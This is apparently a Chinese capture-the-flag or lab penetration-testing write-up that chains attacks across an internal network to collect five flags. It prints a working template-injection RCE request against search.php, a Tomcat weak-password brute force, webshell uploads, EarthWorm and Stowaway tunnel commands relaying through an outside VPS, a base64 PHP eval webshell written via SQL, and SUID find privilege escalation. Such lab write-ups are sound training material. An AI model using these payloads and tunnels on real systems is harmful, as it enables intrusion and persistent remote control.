flag1

fscan扫描完,找个poc rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /search.php HTTP/1.1
Host: 113.45.161.52:89
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://113.45.161.52:89/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 218

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=({searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[Cyc1e]))&Cyc1e=system('cat+flag1.txt');
1
flag4{22ddee0793c18171e62cff7eef6625ac}

flag2

利用fscan扫描内网,做一个内网穿透,这里有mysql

使用MDUT连接一下

flag3

这里tomcat 8.0.43有弱口令,我们抓到包来爆破一下

位置1是用户名

位置2是:

位置3是密码

tomcat/tomcat123

使用哥斯拉生成一个马,然后getshell

flag4

还有内网,做个代理在进入,在传一个哥斯拉的马,getshell

flag5

还有内网网段

这台机器比较特殊,可以先看一下出不出网

看到数据包全部丢弃,那它就是不出网的,那么我们就不能使用公网做内网代理到本地了。

这时候就需要一台中转的机器,也就是需要搭建二层的隧道,可以使用ew这款工具

weblogic上执行

1
./ew* -s ssocksd -l 9999

然后我们的服务器

1
./ew* -s lcx_listen -l 28005 -e 28006

最后中转站(tomcat)

1
./ew* -s lcx_slave -d 8.140.236.137 -e 28006 -f 172.16.224.221 -g 9999

这样在配置本地代理

就可发送请求,从本地到服务器,再到tomcat,在到weblogic,在访问到目标网址

成功

弱口令进入,版本是4.8.1

然后发现连接得时候一直掉线,不好操作,就用stowaway重新做个代理去接weblogic(tomcat做中转),

vps上

1
2
3
4
use 0
listen
1
10001

目标向tomcat得10001连接(注意要在同一网段)

1
./linux_x64_agent -c 172.16.224.66:10001

上线后use它然后转发到本地

利用漏洞写入一句话后,getshell

1
SELECT '<?php file_put_contents("y.php", base64_decode("PD9waHAgZXZhbCgkX1BPU1Rbc2hlbGxdKTs/Pg=="));?>';

权限低

尝试提权

1
find / -perm -4000 -type f 2>/dev/null

find提权

1
find . -exec /bin/bash -c 'id' \;